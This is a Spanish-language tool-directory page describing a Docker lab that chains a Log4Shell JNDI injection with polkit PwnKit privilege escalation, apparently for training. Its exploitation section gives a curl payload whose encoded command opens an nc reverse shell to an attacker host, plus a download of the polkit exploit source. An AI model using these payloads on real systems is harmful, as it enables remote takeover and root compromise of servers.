Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
log4j-polkit-poc — Configuración vulnerable para mostrar una cadena de ataque de log4j CVE-2021-44228 con escalada de privilegios a root mediante el exploit de polkit CVE-2021-4034 | Kitploit
Herramientas/GitHubGitHub/0xalwayslucky/log4j-polkit-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesExplotaciónPruebas de PenetraciónAprendizaje y EducaciónRed TeamingLabs y Práctica
GitHub0xalwayslucky/log4j-polkit-poc

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

log4j-polkit-poc

Configuración vulnerable para mostrar una cadena de ataque de log4j CVE-2021-44228 con escalada de privilegios a root mediante el exploit de polkit CVE-2021-4034

Ver Repositorio
12hace 4 añosAún no revisado

log4j CVE-2021-44228 + polkit CVE-2021-4034

Instancia vulnerable para el exploit de log4j en Apache y escalada de privilegios mediante polkit

  • El archivo vulnerable spring-boot-application.jar fue extraído de esta imagen de docker
  • El servidor JNDI malicioso fue descargado de aquí y referenciado en este artículo.

Vídeo del PoC

Vídeo del PoC

creación de las instancias vulnerables

log4j-polkit-vuln

La instancia vulnerable estará en ejecución y escuchando conexiones en el puerto 80 (expuesto a la máquina host) al completar los pasos siguientes. La parte vulnerable para el exploit de log4j es la cabecera X-Api-Version que se envía al servidor.

Docker: log4j-polkit-vulnerable-server

pasos para descargar y ejecutar la imagen docker vulnerable:

root@kitploit:~
docker pull 0xalwayslucky/log4j-polkit-vulnerable-server
docker run -p 80:8080 0xalwayslucky/log4j-polkit-vulnerable-server

pasos para crear manualmente una instancia vulnerable para log4j + polkit:

Nota: los Dockerfiles requieren ciertas versiones de las aplicaciones vulnerables presentes en los repositorios de ubuntu. Si estas se actualizan y/o eliminan en cualquier momento, la imagen docker fallará al construirse. Para solucionar esto, se subirá una imagen al docker hub y se enlazará aquí.

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/log4j-polkit-vuln
docker build -t log4j-polkit-vulnerable-server .
docker run -p 80:8080 --hostname victim log4j-polkit-vulnerable-server

attackserver

Esto simulará la máquina del atacante, en este caso presente dentro de la misma red (debido a la fácil comunicación entre contenedores docker), pero el exploit funciona sin importar dónde se encuentre este servidor de ataque (la única condición es que sea accesible por la víctima). El servidor JNDI malicioso se alojará aquí y creará una clase maliciosa para ejecutar comandos arbitrarios en la máquina de la víctima.

pasos para crear una máquina de atacante simulada:

root@kitploit:~
git clone https://github.com/0xalwayslucky/log4j-polkit-poc
cd log4j-polkit-poc/attackserver
docker build -t attackserver .
docker run -it --hostname attackserver attackserver /bin/bash
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i <ip> -p 8888 &  # en el contenedor docker

explotación

comandos del vídeo del PoC

Nota: la dirección IP del attackserver puede variar

root@kitploit:~
# Exploit de Log4j
curl http://localhost -H 'X-Api-Version: ${jndi:ldap://172.17.0.3:1389/Basic/Command/Base64/bmMgMTcyLjE3LjAuMyA0NDQ0IC1lIC9iaW4vYmFzaA==}'

# Exploit de Polkit
wget https://raw.githubusercontent.com/afwu/CVE-2021-4035/main/cve-2021-4034-poc.c

Descargar herramienta